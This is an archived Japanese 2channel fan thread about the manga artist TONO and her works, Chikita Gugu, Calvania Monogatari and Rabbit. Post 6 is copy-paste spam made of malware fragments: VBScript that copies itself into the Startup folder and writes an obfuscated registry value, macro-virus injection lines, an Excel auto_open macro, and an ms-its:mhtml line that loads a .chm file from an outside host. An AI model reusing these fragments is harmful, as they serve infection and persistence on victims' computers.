2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【カルバニア物語】TONO☆10【チキタ★GUGU】

1 :花と名無しさん:2006/11/05(日) 16:27:09 ID:???0
ネムキ、Wings、プリンセスゴールド、ウンポコなどで活躍中のTONOさんについて語りましょう。

詳細は >>2-5 あたり

前スレ
【カルバニア物語】TONO☆8【チキタ★GUGU】 (実質9)
http://comic6.2ch.net/test/read.cgi/gcomic/1148009875/

2 :花と名無しさん:2006/11/05(日) 16:27:38 ID:???0
過去スレ
【カルバニア物語】TONO☆8【チキタ★GUGU】
http://comic6.2ch.net/test/read.cgi/gcomic/1135774295/
【カルバニア物語】TONO☆7【チキタ★GUGU】
http://comic6.2ch.net/test/read.cgi/gcomic/1114887795/
【カルバニア物語】TONO☆6【チキタ★GUGU】
http://comic6.2ch.net/test/read.cgi/gcomic/1095589839/
【カルバニア物語】TONO☆5【チキタ★GUGU】
http://comic6.2ch.net/test/read.cgi/gcomic/1068299730/
【カルバニア】TONO★STORY-4【チキタGUGU他】
http://comic.2ch.net/test/read.cgi/gcomic/1056129521/
◆うぐいす姉妹(TONOうぐいすみつる)3◆
http://comic.2ch.net/test/read.cgi/gcomic/1041915824/
◆うぐいす姉妹(TONO&うぐいすみつる)2◆
http://comic.2ch.net/gcomic/kako/1018/10182/1018241604.html
◆◆うぐいす姉妹(TONO&うぐいすみつる)◆◆
http://comic.2ch.net/gcomic/kako/996/996669700.html
TONO  カルバニア物語とか
http://salad.2ch.net/gcomic/kako/977/977657924.html

公式
http://www.urban.ne.jp/home/takoppm/


3 :花と名無しさん:2006/11/05(日) 16:27:56 ID:???0
■レスに文句言う奴・荒らしは放置。
■構う奴も同罪・放置。
■作品、同人、HPに書かれていないプライバシーの暴露は禁止。
■同人話はsage推奨(多くの商業誌のみの方への配慮)。
■興味のない話題はスルー(無視)すること。
■自分の興味のない話題が続く場合、自分から好きな方向へ話題をふる努力をすること。
■だれもノッってこなくてもキレない(次はもっと魅力のある内容の書き込みを☆)
■気に入らない書き込みがあってもキレない(価値観は人それぞれ、ふところをデカく☆)
■荒れないよう相互努力推奨(てかそこまでかしこまらんでもいいんだけど)
■980踏んだら次スレ立てて下さい。
■妹、漫画家うぐいすみつるの話題は荒れる原因になるので遠慮してくれるとうれしい。
みつるさん&同人の話題用はこちらでドゾー
ttp://jbbs.livedoor.jp/bbs/read.cgi/otaku/5179/1125395797/


4 :花と名無しさん:2006/11/05(日) 17:31:43 ID:???0
>1さん乙カレー。

5 :花と名無しさん:2006/11/05(日) 17:50:40 ID:???0
華麗に5ゲット!

6 :<body onload=window()>:2006/11/05(日) 19:21:17 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/11/05(日) 21:08:09 ID:???0
スレごとアボンするなぁ・・・
しかしもう眠い・・・

8 :花と名無しさん:2006/11/05(日) 21:16:11 ID:???O
保守がてら>>1乙。

9 :花と名無しさん:2006/11/05(日) 21:23:20 ID:???0
捕手

10 :花と名無しさん:2006/11/05(日) 21:25:19 ID:???0
>1 乙ー。

11 :花と名無しさん:2006/11/05(日) 22:00:32 ID:???0

   ○○○
  ○ ・ω・ ○ かわいいオレが11ゲット
   ○○○  
  .c(,_uuノ


12 :花と名無しさん:2006/11/06(月) 09:23:13 ID:???0
>>1 乙。
カルバニアの新作が早く読みたい〜!

13 :花と名無しさん:2006/11/06(月) 12:03:00 ID:???0
6ってなんなの?
この頃よく見かけるけど。
これって荒らし??

14 :花と名無しさん:2006/11/06(月) 12:06:22 ID:???0
>>13
コピペ嵐。
反応すると喜ぶからスルー汁。

15 :花と名無しさん:2006/11/06(月) 13:48:07 ID:???0
>>11
ラーがそんなだったらチキタが食べそう

16 :花と名無しさん:2006/11/06(月) 21:31:11 ID:???0
>>15
食べてからハッとするチキタ?

17 :花と名無しさん:2006/11/06(月) 22:30:18 ID:???O
>>1 乙です。

作家と作品は別物と分かっていても、
チキタや諸作品を読むたび、
TONOさんのバックグラウンドが気になる。

どうしてこんな物語が書けるんだろう。

18 :花と名無しさん:2006/11/07(火) 00:41:02 ID:???O
>>1
乙です
6は携帯だから影響ないんだけど、あちこちで見るなぁ、流行り?

19 :花と名無しさん:2006/11/07(火) 00:48:00 ID:???0
>>17
TONOさんが姉妹が出してるエッセイ本読むと
日常を結構知ることができるよ。
どうしてこんな物語を…までは読んでも想像つかないかもしれないが
しましまとか、TONOさん特有の生死観が伺い知れる気がする。

20 :花と名無しさん:2006/11/07(火) 05:28:26 ID:???0
>>1
キモイ

失せろ

あんたにスレたてを頼んでない

21 :花と名無しさん:2006/11/07(火) 16:32:19 ID:???0
なんか偉い人ぽいのがキタ

22 :花と名無しさん:2006/11/07(火) 18:53:58 ID:???0
>>20
ごめんね。おかあさんはじめてすれたてしたから、ごめんね
たかしに 980 とらせてあげればよかったね、ごめんね

23 :花と名無しさん:2006/11/08(水) 21:28:11 ID:RtIRsTP2O
>19
もれなく妹の漫画が付いてくるのがやるせない

24 :花と名無しさん:2006/11/09(木) 01:22:17 ID:???O
その妹さんの漫画にのってるとのこさん像も興味深い。

25 :花と名無しさん:2006/11/09(木) 11:41:55 ID:???0
>>23
そんな貴方にうってつけ
ttp://jbbs.livedoor.jp/bbs/read.cgi/otaku/5179/1125395797/l50

26 :花と名無しさん:2006/11/11(土) 11:48:41 ID:???0
即死回避に1>乙

27 :花と名無しさん:2006/11/12(日) 22:04:51 ID:YYLOG/Vp0
ほすあげ

これだけ評判のいい話を描いてるのに、アニメ化の話って聞いたことがない。
きてもTONOさんが全部断ってるのかな?
エグイ表現もあるけど、どれかはアニメ化してもいいと思うんだけどな。

28 :花と名無しさん:2006/11/12(日) 22:10:09 ID:???0
アニメが嫌いなのでアニメ化はしてほしくない

29 :花と名無しさん:2006/11/12(日) 22:15:20 ID:???0
TONOさんの漫画って想像力を呼び起こすタイプのものだから
アニメにしちゃうと監督のイメージの押し付けになってしまって
TONO漫画の良さが失われてしまう気がする。

30 :花と名無しさん:2006/11/12(日) 22:21:43 ID:???0
アニメは隙間なくきっちり色塗るのが基本だから
あの白っぽい画面が台無しになると思う。

31 :花と名無しさん:2006/11/12(日) 23:30:36 ID:???0
この流れなら大丈夫だろうけど念のため…

・アニメ化想像による声優キャスティングは
 どのスレでももれなく荒れるので禁止の方向で

32 :花と名無しさん:2006/11/12(日) 23:37:38 ID:???0
実写化妄想による俳優キャスティングも追加して

33 :花と名無しさん:2006/11/13(月) 00:03:17 ID:???0
実際どの程度の認知度があるんだろう?TONOさんて
最近よくある女性誌の「マンガ特集」に登場してるとこは見たことないし
ミケに行くような層にはどうなのか…とかちょっと知りたい

34 :花と名無しさん:2006/11/13(月) 00:20:23 ID:???0
でもこの間彼氏連れのかなりギャルな姉さんが買って行ったよby書店員
どこで知ったんだろう…って思った。
まあ女は魔物だから、あんなオサレでもキャラ読んでるのかな、とオモタ。

35 :花と名無しさん:2006/11/13(月) 00:43:47 ID:???0
>>33
一般的な知名度としては、「日本ふるさと沈没」のメンツは
だいたい平均的に揃ってるんじゃないかな。

女性漫画好き(ってこれはTONOさんしかいなかったけど)・
少年漫画好き・青年漫画好きの、それぞれ比較的マニアックな
ファンにはおなじみの名前、って感じ。

36 :花と名無しさん:2006/11/13(月) 10:07:20 ID:???0
アニメねえ、いっその事マッドハウスとかに作らせて
180度方向の違うもんにしたら楽しそうだ

37 :花と名無しさん:2006/11/13(月) 14:46:51 ID:???0
原案レベルの奴か

そのくらいじゃないと大規模な商業展開は難しそうな漫画ばかりだなぁ

38 :花と名無しさん:2006/11/13(月) 15:05:17 ID:???0
カルバニアのアニメなら毎回タニア他のドレスチェンジ
勿論一話の中で日にちが違う時も全部着替えるって
いわれれば乗りそうなイメージ>との

まあこんな作りかたできる会社はないんだろうが

39 :花と名無しさん:2006/11/13(月) 18:44:51 ID:???0
蟲師作ったレベルなら、すごい物ができるかと。

40 :花と名無しさん:2006/11/13(月) 19:15:36 ID:???0
カルバニア3巻読み返した。
この巻は傑作だなぁ。

41 :花と名無しさん:2006/11/14(火) 02:18:15 ID:???O
>>40
貸して欲しい…
文庫化しないかなー

42 :花と名無しさん:2006/11/14(火) 08:00:49 ID:???O
持ってないの?

43 :花と名無しさん:2006/11/14(火) 09:14:55 ID:???0
普通に売ってないか?
かさばるからいやだっつーならそれまでだけども。

44 :花と名無しさん:2006/11/14(火) 13:59:08 ID:???0
「TONOが天才なのは描くものに駄作がないからだ」
ってどっかの書評で読んだことがある。すっごく納得した。

45 :花と名無しさん:2006/11/14(火) 14:52:36 ID:???0
むしろ読み手が寛容なんでないか。

あの絵をクリアした時点で大抵のことは流せるようになってるから
不満も少なめ。

46 :41:2006/11/14(火) 16:04:27 ID:???O
>>42
>>43
はまった時には在庫切れだったの

47 :花と名無しさん:2006/11/14(火) 16:14:38 ID:???0
>>46
最近重版かかったみたいだから、今なら
本屋に置いてる率高いよ>3巻

48 :花と名無しさん:2006/11/14(火) 17:33:48 ID:???0
>>45
納得

49 :花と名無しさん:2006/11/14(火) 18:14:28 ID:???0
読者が変に期待しすぎてないってのはあるような気もする。
いい方向で裏切られるから、満足度が高いんだよね

50 :花と名無しさん :2006/11/15(水) 09:58:24 ID:???0
パイエって自分がしたことを悔いたり反省したりすることもなしに、壊れた頭のまま幸せに逝ったんだよね。
彼女の不幸な生い立ちは生い立ちとして、ちょっともにょもにょ。


51 :花と名無しさん:2006/11/15(水) 11:31:20 ID:???0
後悔や反省も出来ないまま終わったとも言えない?
ついに人になれないままだったと解釈した

それでも周りは人として葬っているから、歯がゆいし暖かい

52 :花と名無しさん:2006/11/15(水) 12:54:00 ID:???0
そうか、
自分は結局あやかしになっても、パイエは人のままだったなって思った。

53 :花と名無しさん:2006/11/15(水) 12:58:14 ID:???0
パイエの話の悲しみは、
*周りの環境の所為で、まともに人として生きる機会を壊されたこと
*自分の痛みに全く気がつかず、死なねばならなかったこと
*結局最後まで、誰一人として、心の底からありのままの彼女を、受け入れる人がいなかったって事
*ひょっとしたら理解し合えそうでありながら、何処までも理解に届かないチキタ側の歯がゆさと口惜しさを
達観しているチキタたちは感じない代わりに読者が受け取っている点

自分にとってはこんな感じだな。

54 :花と名無しさん:2006/11/15(水) 20:30:10 ID:???0
TONOさんは、一般的な善悪とは違った物の測り方をしてるからなー。
極悪人や自己中な人間を悪だと断じ切らない目線が、この人の長所だし、
またそこに違和感を感じる人もいるだろうと思う。

私もたまになんで?と思う事はあるけど、全体的にこのTONOさんの目線は好きだ。
パイエは違和感なかった。
チキタは、人と、あやかしと、人の枠からはみだしてしまった人を
それぞれ等価に描いているから、人間寄りの視点だけで見てると
不愉快なシーンも多いかもしれないと思う。

55 :花と名無しさん:2006/11/16(木) 11:03:09 ID:???0
違和感も不愉快も、今のところ感じてるって意見は出てないね

56 :花と名無しさん:2006/11/16(木) 22:49:01 ID:???0
>>55
>>50

57 :花と名無しさん:2006/11/17(金) 00:41:51 ID:???0
ラビットの時なんかはこのスレでもかなりキャラ叩きがあった気がする

58 :花と名無しさん:2006/11/17(金) 00:49:50 ID:???0
カルバニアやチキタと違って、なまじ価値観が実感できるから
論争も激しくなるんだろうね。
ファンタジーなら「現代日本と比較するなよ」で終わりなんだけど。

59 :花と名無しさん:2006/11/17(金) 00:56:26 ID:???0
ラビットの論争は凄かったね。
上の方でTONOさんの作品に駄作なしと言われてるけど
個人的にラビットは…まあ駄作とまでは言わないけどかなり残念な部類だな。
TONOさんもいまいちノって描いてない感じがした。

60 :花と名無しさん:2006/11/17(金) 01:12:02 ID:???0
私は無性に読みたくなるときがあるよ。<ラビット
チャイナ可愛いし、ベリンダも好き。
文庫(犬童以外)のは全然読み返さない…

61 :花と名無しさん:2006/11/17(金) 01:13:53 ID:???0
ラビットの続きを心待ちにしている私がきましたよ。
でもまあノッてないというか、まだ描きたいところの半分にも
辿りついてないじゃないかなーという印象はある。

62 :花と名無しさん:2006/11/17(金) 01:14:51 ID:???0
ラビットって、結局何巻まで出たの?
1巻しか持ってないやー。書店でも見かけないし。

63 :花と名無しさん:2006/11/17(金) 01:27:50 ID:???0
ラビット好きだったな
TONOさんの恋愛観好きだ

64 :花と名無しさん:2006/11/17(金) 03:54:53 ID:???0
ラビット嫌いじゃないけど、TONOさんの作品として私は正直少ーし物足りないかな。
厳しい内容を独特な作風で厳しく読ませない不思議さが好きなのだけど、ラビットは
あまりに直球過ぎるっていうか。(煮詰めが足りなかった?それともわざと狙ってる?)
ドキュメントや本でよく見る虐待ものの話をまんま漫画で読んだっていう読後感で、
コレ別に他の人が描いても良いんじゃ…って思っちゃったから。
勿論、それでもちゃんとTONOさんテイストではあるし面白かったですけど。
登場人物や描き方がドライで、でも作者の視点が暖かい。やっぱいいわーTONOさん。

私はTONOさんだとダスクが一番好きかなー。
あとチキタのニッケル退場までの流れが大好き。ニッケルには何度泣かされたか…

65 :花と名無しさん:2006/11/17(金) 11:36:24 ID:71u+9XF90
ラビットはTONOさんにしては珍しく狙ってやっているようだ。
そういう発言を目にしたことがある。

66 :花と名無しさん:2006/11/17(金) 22:19:28 ID:???O
兎話中スマソ。
フィリピンで野良犬に噛まれて狂犬病で亡くなった男性のニュース聞いて
猛母が心配になったよ〜。
今は日本で妹さんとこと住んでるんだっけ?
でもマンションあるから、またあちらに旅行・滞在もありえるよね。
予防摂取?ワクチン?よく分からないけど、予め気を付けて下さい〜。

67 :花と名無しさん:2006/11/17(金) 22:28:11 ID:???0
マンションはハワイで猛母実家のものだったはず。
フィリピンのは彼氏の邸宅でマダム生活w

68 :花と名無しさん:2006/11/17(金) 22:41:41 ID:???0
フィリピンの彼と別れたのなんて相当昔なんじゃないの。

69 :花と名無しさん:2006/11/17(金) 23:07:40 ID:???0
同居解消しただけで別れてないのでは?

70 :花と名無しさん:2006/11/18(土) 13:24:04 ID:???0
ウイングスの赤裸々日記の恐怖体験に笑った。ツボだった。
本屋で立ち読んでいたので笑いをこらえるのが大変だった。

71 :花と名無しさん :2006/11/19(日) 10:33:37 ID:???0
チキタ6巻の120Pのパイエのセリフ 
「女は子産を産み出すと・・・」
になってるんだけど、皆さんのもそう?

72 :花と名無しさん:2006/11/19(日) 12:37:09 ID:???0
>71
自分のもそうなってるよ
「子供」の誤植かね

73 :花と名無しさん:2006/11/19(日) 18:01:20 ID:???0
なってる
「血を分けた後裔」とかのかっこいい言い方だと思ってスルーしてた……誤植か

74 :花と名無しさん:2006/11/19(日) 18:33:03 ID:???0
釈迦、孔子を産んだ女はエラいという表現をベースに、孔子すら尊敬した子産を産んだ女性は…というニュアンスではあるまいか。

本気にしないように。

75 :花と名無しさん:2006/11/19(日) 19:31:51 ID:???0
民明書房かとオモタ

76 :花と名無しさん:2006/11/21(火) 23:06:44 ID:???0
>>54
極悪人がほざくな

77 :花と名無しさん:2006/11/26(日) 08:11:31 ID:???0
hosyu

78 :花と名無しさん:2006/11/26(日) 10:58:49 ID:???0
ニッケルって何才の設定だったんだろう
13、4位と思ってるんだけど若すぎる?

79 :花と名無しさん:2006/11/26(日) 13:12:38 ID:???0
15・6くらいだと思ってた

80 :花と名無しさん:2006/11/26(日) 16:28:37 ID:???0
じゃあ14,5歳で。

81 :花と名無しさん:2006/12/02(土) 16:19:37 ID:???0
寒くなってきた、この季節。
カレンのような軽くてあったかいオニャノコほすい・・・

82 :花と名無しさん:2006/12/02(土) 17:00:18 ID:???0
春になったらいらないのか

83 :花と名無しさん :2006/12/04(月) 12:07:33 ID:???0
四月一日に綿ぬきして、単にすればよろしい。

84 :花と名無しさん:2006/12/04(月) 22:03:44 ID:???0
ちょwww

85 :花と名無しさん:2006/12/08(金) 19:11:13 ID:???0
>>65
狙ってやっているって、何を?

ラビット久しぶりに読んだけど、やっぱり好きだな〜。
この性の取り扱い方って他の漫画では見られないと思う。

86 :花と名無しさん:2006/12/10(日) 01:37:57 ID:???0
それは持ち上げすぎ
心と体は別だから酷い事されても平気、みたいなのは他でもよくある
でも自分もラビットは好きだな

87 :花と名無しさん:2006/12/10(日) 09:24:42 ID:???0
>心と体は別だから酷い事されても平気、みたいなの

単にそういう設定の事を指したんじゃなくて、
そういったような事を淡々と語る目線っていうの?
普通はそういうキャラを設定すると重かったり感情移入が濃かったり、
「こんなの普通よ日常よ」って描きながらも、どこかに作者の陶酔が滲み出てくるじゃない。
そういうのがTONOさんのはないな〜って。
重い材材をこうもあっさりと普通に描ける人って希有じゃない?

他にこういう感覚の作家さんがいるなら是非教えて欲しい。

88 :花と名無しさん:2006/12/10(日) 14:54:14 ID:???0
>>87
夢路さんとか。遠藤さんとか。高野さんとか。やまださんとか。近藤さんとか。
男性作家さんなら、初期の高橋氏とか?

作者の陶酔 ってのが、どこまで何を指すかわからんが。
わたしはこんな感じかね。
ま、いろいろだろ。

89 :花と名無しさん:2006/12/10(日) 15:31:34 ID:???0
清原なつのさんあたりも結構淡々としてるかな。

90 :花と名無しさん:2006/12/10(日) 16:10:50 ID:???0
昔の吉田秋生。川原泉。
坂田靖子。花郁悠紀子。


91 :花と名無しさん:2006/12/10(日) 20:17:17 ID:???0
明智抄とか。
佐藤史生とか。


92 :花と名無しさん:2006/12/10(日) 21:21:52 ID:???0
最近はアレだけども、紫堂恭子さんは?
絵柄はTONOさんみたいにキラキラしいよ。毒もそれなり。

93 :花と名無しさん:2006/12/10(日) 21:36:32 ID:???0
金田一蓮十郎。曽根まさこ。北道正幸。竹本泉。
特別に「緑の誘惑」シリーズの名香智子。

94 :花と名無しさん:2006/12/10(日) 21:40:46 ID:???0
え?
なんで吾妻ひでおが入ってないの?

95 :花と名無しさん:2006/12/11(月) 00:24:49 ID:???0
須藤真澄さん
かわいい絵柄だけど毒が深いw

96 :花と名無しさん:2006/12/11(月) 02:59:01 ID:???0
上に上げられてる人たち、殆ど知らないw


97 :花と名無しさん:2006/12/11(月) 04:03:35 ID:???0
>>95
須藤真澄ってあんまり性的なネタは描かないような…
小ネタでも「あんたにも子種あったんだねぇ」くらいしか思い当たらない。

98 :花と名無しさん:2006/12/11(月) 07:20:22 ID:???0
自分にとってはTONOさんと真逆な人の名前も結構あがってて驚く。
やっぱ人の感じ方ってそれぞれだねえ。

99 :花と名無しさん:2006/12/11(月) 09:23:43 ID:???0
>>92
辺境が一番好きだった<紫堂

100 :花と名無しさん:2006/12/11(月) 09:26:02 ID:???0
知らない漫画家もいるけれど、自キャラ萌えがあまり目立たない
作風の人が多いなと思った。

101 :花と名無しさん:2006/12/11(月) 09:32:54 ID:???0
>>99
私はグラン・ローヴァ物語のおじいちゃんが好き。

淡々と意味深な性の話を描ける清原なつの。
でも同じジャンルをTONOさんが描いても、作風が全然違うから別腹で読める。

102 :花と名無しさん:2006/12/11(月) 12:33:35 ID:???0
>>88
>夢路さんとか。遠藤さんとか。高野さんとか。やまださんとか。近藤さんとか。
>男性作家さんなら、初期の高橋氏とか?

名字だけだとどの作家のことか判断つかんのだけど
夢路行、遠藤淑子、高野文子、やまだないと、近藤るるる、高橋葉介
あたりであってる?

103 :花と名無しさん:2006/12/11(月) 13:43:31 ID:???0
高橋葉介か。
陽一?ヒロシ?と素で悩んでた。

104 :花と名無しさん:2006/12/11(月) 16:27:39 ID:???0
>>102
この流れで近藤るるるはないと思うが……
近藤ようこじゃないかな。
漫画家はフルネーム書かないとわからん場合も多いなあ。

やまだ紫、という人もいるな。

105 :花と名無しさん:2006/12/11(月) 16:51:30 ID:???0
高野まさこかと思ったが今ではもう描いてないしなぁ

106 :花と名無しさん:2006/12/11(月) 17:08:16 ID:???0
>>92
近作でも王国の鍵とか、シープホーン村とかええよ。
でも、紫堂さんは性的なネタはほとんど描かないけど。

107 :花と名無しさん:2006/12/11(月) 17:11:02 ID:???0
近藤ようこのは目いっぱい重いぞ。

108 :花と名無しさん:2006/12/11(月) 18:46:57 ID:???0
近藤はきっついね。
TONOさん読んでるとどうしても山岸凉子さん想起してしまう。

109 :花と名無しさん:2006/12/11(月) 19:41:53 ID:???0
山岸涼子も重くない?

重い性を扱ってるのって
知ってる範囲だと重い作家しか浮かばない

110 :花と名無しさん:2006/12/11(月) 19:44:58 ID:???0
なんとなく絵の雰囲気がおがきちかと似ているなと思う時がある
ざっくり描いている感じが
話は全然違うけど
どっちも好きです

111 :花と名無しさん:2006/12/11(月) 20:05:29 ID:???0
ギシ先生のテレプシは読んでて久しぶりに鬱になったよ。

112 :花と名無しさん:2006/12/11(月) 20:27:37 ID:???0
そうか。
TONOさんのはハードでも欝になったことないかも

113 :花と名無しさん:2006/12/11(月) 21:05:21 ID:???0
>>87が知りたかった答えはどれですか?
それによって答えが変わるのですが…

1.重い題材をあっさり描ける作家
2.性的な題材をあっさり普通に書ける作家
3.TONOさんと似た作風の作家
4.「そんなのTONOさんの他には存在しない」というマンセー呼応

114 :花と名無しさん:2006/12/11(月) 23:18:54 ID:???0 ?2BP(0)
>>103 この流れでヒロシはねーよwwwwwwwwwwwwwwwwww

>>88 遠藤さんの作品大好きだし、確かに淡々と物語を綴るみたいなところは有るんだけど、
作中の人物が痛みを感じる場面では、遠藤さんも傷みを感じている気がする。

良い悪いではなくて、TONOさんは作中の人物とのシンクロってあまりして無い気がする。

115 :花と名無しさん:2006/12/11(月) 23:52:08 ID:???0
87>>113
1+2+3かな。

>114が言うように、作中のキャラとシンクロしてないのが
TONOさんのかなり珍しい個性だと思う。

116 :花と名無しさん:2006/12/12(火) 01:12:50 ID:???0
なんかこう、すこんと突き抜けた視点があるよね。
山岸さんなんかは、読んでて中へ引きずり込まれるような重さがある(天人唐草なんかすごかった)んだけど、
TONOさんのはすかっと裏側へ抜ける感じで、こっちに重圧がかからない。
だから内容が重くても、山岸作品ほど鬱にならない。

117 :花と名無しさん:2006/12/12(火) 01:38:14 ID:???0
カルバニアって細かい年齢設定出てないよね?
タニアとエキューっていくつ違うんだろう。

同じ女の乳を加えた仲とあったが、王女と公爵令嬢の乳母なら
二箇所に通って同時期並行なんてこともなく期間中は一人に専従だろうから
二人にも年齢差が生じるよね。

118 :花と名無しさん:2006/12/12(火) 02:14:53 ID:???0
確かどっかでエキューが1歳年下って書いてたような。
乳母、どんだけ長く乳出てたんだってか
王宮勤めでその後も乳母ずっとやってるのに合間にエキューにもお乳をやったのか?って
真面目に考え出すと収拾がつかなくなったよ、昔w

119 :花と名無しさん:2006/12/12(火) 10:11:55 ID:???0
エキューは18ってTONOさんの実録漫画のどっかにあったよ

120 :花と名無しさん:2006/12/12(火) 11:40:56 ID:???0
公爵が子連れで宮廷に来てエキューが腹減った!と喚いて乳母借りたとかw

121 :花と名無しさん:2006/12/12(火) 12:59:48 ID:???0
乳母って、子ども1人につき数人いるんじゃないかな。
光源氏の乳母も最低2人いたはず。
乳母自身の子どもも乳飲むし、いつ止まるか判らないもんだし。

タニアの乳母も、アガサともう1人いたんだと思う。
タニアが卒乳したあと、お世話係としてアガサが残り、
もう1人の乳母は年子で子どもを産んで、
今度はエキューの乳母として勤めたのではないだろうか。

122 :花と名無しさん:2006/12/12(火) 13:05:35 ID:???0
ヨーロッパの宮廷なら乳母って乳を出すばっかりが仕事じゃないんだよね
要は赤ん坊の養育責任者(当時の宮廷夫人は育児なんてしないから)の侍女頭みたいなもん
だから乳は出ない乳母(乳はそれ専門の女性を雇う)もありだったらしい。

123 :花と名無しさん:2006/12/12(火) 13:13:30 ID:???0
>もう1人の乳母は年子で子どもを産んで

子供生まなくても、乳をすう子がいる限りは
何年も乳が出続ける人が多いんじゃなかったっけ?
現代は断乳しちゃうからすぐ出なくなるけど。

124 :花と名無しさん:2006/12/12(火) 14:35:42 ID:???0
乳兄弟って絆強くなるから、そこんところは爺どもが画策した
と思っている。タニアの乳母を下げ渡しみたいな感じで。
王家の味方を一人でも多く作りましょー計画。
まあ二人は爺関係なくラブラブだけどな。

125 :花と名無しさん:2006/12/12(火) 16:04:39 ID:???0
プリシラがエキューをお産後すぐ亡くなったから王家からお見舞い(?)として
心効いた乳母や侍医が使わされたんじゃないかな〜と勝手に思ってる。

>123
数年出る母もいるけど産後1年くらいで母乳の質がうすくなるから新生児育てるのにはダメみたいよ

126 :花と名無しさん:2006/12/12(火) 17:55:35 ID:???0
母乳が薄くなるってのは迷信。
つーか、年数重ねたほうが栄養価が高くなるのよ。
まだ迷信を信じて1年もたたずに断乳する人が多いけどね。

ソースは「山内先生 母乳 迷信」あたりででググってください。


127 :花と名無しさん:2006/12/12(火) 18:01:17 ID:???0
栄養価は分からないけれど、2,3年なら吸われる間は母乳出ます@体験談
さすがに3年半後に涸れたので卒乳しましたが、女の体は律義だと実感しました。

128 :花と名無しさん:2006/12/12(火) 18:02:31 ID:???0
127訂正。
母乳が出にくい体質の人もいるので、一概には言えないです

129 :花と名無しさん:2006/12/12(火) 18:28:46 ID:???0
>>126さん
スレ違いだけど山内氏の思想自体かなり偏っているので安易に勧めるのは…(ry
新生児に限っていえば大事な免疫の関係もあるし逆に濃くない方が未熟な胃腸の吸収によいのだよ

とまあこれだけだと、私もスレチになってしまうので無理矢理だけど
タニアの乳母はアガサでエキューも温泉の回想してる箇所に名前無いけど乳母出てきたよね?
エキューが「同じ女の乳くわえた」と言ってるから乳母は複数いたんだろうね。
でも突発的な>120さんみたいなの想像すると可愛くて良いなw

130 :花と名無しさん:2006/12/12(火) 20:49:30 ID:???0
タニアと同じ女の乳くわえてた頃のエキューを見てみたい。
その頃タニアはまだよちよち歩きか。可愛かっただろうなあ…

131 :花と名無しさん:2006/12/12(火) 22:23:47 ID:???0
>>118
乳って、飲む対象が居るといつまででも出るよ。
実例で、知り合いの子がせがむからいつまでもやってたら・・・

小学校低学年(w

132 :花と名無しさん:2006/12/12(火) 23:14:27 ID:???0
>>131
それはキモい友人ですね

133 :花と名無しさん:2006/12/12(火) 23:29:19 ID:???0
知り合いの子にせがまれて131がいつまでもやってたのかと思った…

134 :花と名無しさん:2006/12/12(火) 23:39:54 ID:???0
>>133
自分もそう読んでしまったw

135 :花と名無しさん:2006/12/13(水) 20:06:22 ID:???0
ネムキ読んだけどチキタまだ終わりじゃないよね?
ネムキって最終ページどの作品でもつづくじゃなくて
オワリって書いてあるよね、確か。
どうなるんだろうラー。
終わりに近づいてる感じは確実にするけど、
どういう結末になるのか全然予測つかない。
幸せになって欲しいよラー。

136 :花と名無しさん:2006/12/14(木) 10:42:25 ID:???O
砂の下の夢ってもう二巻出てますか?

137 :花と名無しさん:2006/12/15(金) 00:31:47 ID:???0
>>135
終わりなら予告に最終回って書くだろうから終わりじゃないと思う。
予測してみたけど
あのまま静かに終わりを迎えるか
奇跡か何かが起こって万能ラーに戻るのと二通りくらいしか思いつかない。
ご都合主義展開は好きじゃないから前者の方がまだいいけど…

わかっていたこととは言え、実際にラーがあの状態になっちゃうと
結構つらいもんがあるな。

138 :花と名無しさん:2006/12/15(金) 21:08:13 ID:???0
>>136 出てない。連載続いてないんじゃない?

139 :花と名無しさん:2006/12/15(金) 21:16:34 ID:???0 ?2BP(1)
ネムキ読んだけど、次回はきっとメ欄かな?
今回は、チキタの悲しみも慈愛も、ラーの思いも全てがいとおしかった。

個人的には、御都合主義でもなんでも、幸福な結末となってほしい。

140 :花と名無しさん:2006/12/16(土) 01:36:56 ID:???O
>138ありがとうございます。
昨日ネットでカレンのファスナーと黄色い海岸注文しました。読んだ方いますか?

141 :花と名無しさん:2006/12/16(土) 01:57:30 ID:???0
それ聞いてどうするの?

142 :花と名無しさん:2006/12/16(土) 02:19:37 ID:???0
>>140
読んでる人の方がほとんどだと思うけど?
そういう回りくどい嫌な言い方はやめようね。
話したかったら自分から萌えポイントを語ってね。

143 :花と名無しさん:2006/12/16(土) 16:55:36 ID:???0
砂の下の楽園 (2) 2/16発売

ソースは今日発売のプリンセスGOLD

144 :花と名無しさん:2006/12/16(土) 19:34:33 ID:???0
>143
題名違ってないか?

145 :花と名無しさん:2006/12/16(土) 21:29:57 ID:???0
今市子スレかとおもったじゃないかw

146 :143:2006/12/16(土) 21:42:43 ID:???0
間違えたw
今市子とごっちゃになってる、スマソ

147 :花と名無しさん:2006/12/17(日) 06:50:32 ID:???O
>141>142すみませんでした。ただ単純に面白いのかどうか聞きたかっただけです。
届くの楽しみです。

148 :花と名無しさん:2006/12/17(日) 21:31:05 ID:???0
>>143
何にせよ、ありがとう。
楽しみだ。。。

149 :花と名無しさん :2006/12/20(水) 09:26:43 ID:???0
ラーのあの状態であと百年は無理だよね、やっぱり。


